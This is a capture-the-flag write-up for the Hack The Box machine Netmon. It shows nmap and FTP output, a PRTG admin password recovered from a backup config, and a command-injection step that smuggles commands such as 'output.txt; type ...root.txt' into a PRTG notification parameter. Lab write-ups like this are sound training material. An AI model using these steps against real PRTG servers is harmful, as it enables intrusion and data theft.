Today Netmon retired and this is how I get in to the machine. It was rated as the easiest machine in Hack the Box so let's start.
- OS: Windows
- IP: 10.10.10.152
- Difficulty: Easy
First I did some nmap scan to get some information of machine. The result showed that it was a Windows machine which had some ports opened.
# nmap -sV -sC -A -Pn 10.10.10.152 Starting Nmap 7.30 ( https://nmap.org ) art 2019-05-20 13:56 KST Nmap scan report for 10.10.10.152 Host is up (0.30s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP lgoin allowed (FTP code 230) | 02-03-19 12:18AM 2024 .rnd | 02-05-19 10:15PM <DIR> inetpub | 07-16-16 09:18AM <DIR> PerfLogs | 02-25-19 10:56PM <DIR> Program Files | 02-03-19 12:28AM <DIR> Program Files (x86) | 02-03-19 08:08AM <DIR> Users | 02-25-19 11:49PM <DIR> Windows 80/tcp open http Indy httpd 184.108.40.20646 (Paessler PRTG bandwidth monitor) |_http-server-header: PRTG/220.127.116.1146 | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds Service Info: 05s: Windows, Windows Server 2008 R2 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -1s, deviation: 0s, median: -1s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol Post-scan script result: | clock-skew: |_ -1s: Majority of systems scanned Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 64.75 seconds
The first thing I was looking at was port 21 was opened with anonymous login. So, I tried open it via web browser
And this was what inside it.
I opened the
ftp://10.10.10.152/Users/Public/ and there was a
user.txt flag. So just download and view the user hash.
After getting the user hash via FTP, I started checking the port 80 and I got this.
It was kind of Network Monitor so I started searching google for PRTG Default login information. And the default user and password is
prtgadmin. But I could not login with this user.
I started searching for prtg exploit on google and I found this link which is Command Injection vulnerability. However, I needed to login the the dashboard to do so.
I went back to the FTP service. But this time I logged in using terminal with user
Anonymouse and blank password (We can do more thing on terminal than browser xD).
# ftp Anonymous@10.10.10.152 Connected to 10.10.10.152. 220 Microsoft FTP Service 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls -a 229 Entering Extended Passive Mode (|||49870|) 125 Data connection already open; Transfer starting. 11-20-16 10:46PM <DIR> $RECYCLE.BIN 02-03-19 12:18AM 1024 .rnd 11-20-16 09:59PM 389408 bootmgr 07-16-16 09:10AM 1 BOOTNXT 02-03-19 08:05AM <DIR> Documents and Settings 02-25-19 10:15PM <DIR> inetpub 06-04-19 08:37AM 738197504 pagefile.sys 07-16-16 09:18AM <DIR> PerfLogs 02-25-19 10:56PM <DIR> Program Files 02-03-19 12:28AM <DIR> Program Files (x86) 02-25-19 10:56PM <DIR> ProgramData 02-03-19 08:05AM <DIR> Recovery 02-03-19 08:04AM <DIR> System Volume Information 02-03-19 08:08AM <DIR> Users 02-25-19 11:49PM <DIR> Windows 226 Transfer complete. ftp>
ls -a I could see the more hidden directories and it looked interesting.
I checked every directories and found the directory of PRTG which was
/ProgramData/Paessler/PRTG\ Network\ Monitor/.
ftp> ls 229 Entering Extended Passive Mode (|||49937|) 125 Data connection already open; Transfer starting. 02-03-19 12:40AM <DIR> Configuration Auto-Backups 06-04-19 08:38AM <DIR> Log Database 02-03-19 12:18AM <DIR> Logs (Debug) 02-03-19 12:18AM <DIR> Logs (Sensors) 02-03-19 12:18AM <DIR> Logs (System) 06-04-19 08:38AM <DIR> Logs (Web Server) 02-25-19 08:01PM <DIR> Monitoring Database 06-04-19 08:46AM 1198183 PRTG Configuration.dat 02-25-19 10:54PM 1189697 PRTG Configuration.old 07-14-18 03:13AM 1153755 PRTG Configuration.old.bak 06-04-19 08:39AM 1647616 PRTG Graph Data Cache.dat 02-25-19 11:00PM <DIR> Report PDFs 02-03-19 12:18AM <DIR> System Information Database 02-03-19 12:40AM <DIR> Ticket Database 02-03-19 12:18AM <DIR> ToDo Database 226 Transfer complete. ftp> get PRTG\ Configuration.old.bak
PRTG Configuration.old.bak and checked what inside the file. Yeah, I found this.
... <dbpassword> <!-- User: prtgadmin --> PrTg@dmin2018 </dbpassword> ...
It must be the password to login to PRTG webpage. But the password was incorrect. So, I tried changing it to
PrTg@dmin2019 and it worked xD.
By following this link, I tried execute some command to test if it works or not.
In Account Settings section, click on
Click on any
Notificationto edit or add new.
Execute Programoption and turn it on.
Put some command to execute.
First I used
output.txt; tree /f C:\Users\Administrator > C:\output.txt
to check the location of
Go back to the
Notificationobject page, and click
Send test notification.
PRTG System Administrator.
After that, open
output.txt file should be here.
Download and view that file.
Folder PATH listing Volume serial number is 00000200 684B:9CE8 C:\USERS\ADMINISTRATOR ├───Contacts ├───Desktop | └───root.txt ├───Documents ├───Downloads ├───Favorites ├───Links ├───Music ├───Pictures ├───Saved Games ├───Searches └───Videos
root.txt file was located in
I went back to the PRTG dashboard again and edited command in notification to
output.txt; type C:\Users\Administrator\Desktop\root.txt > C:\output.txt
After sending a test notificaton, now I got a root flag in output file.
Edited: I just found this way and it is much easier lolz => Link]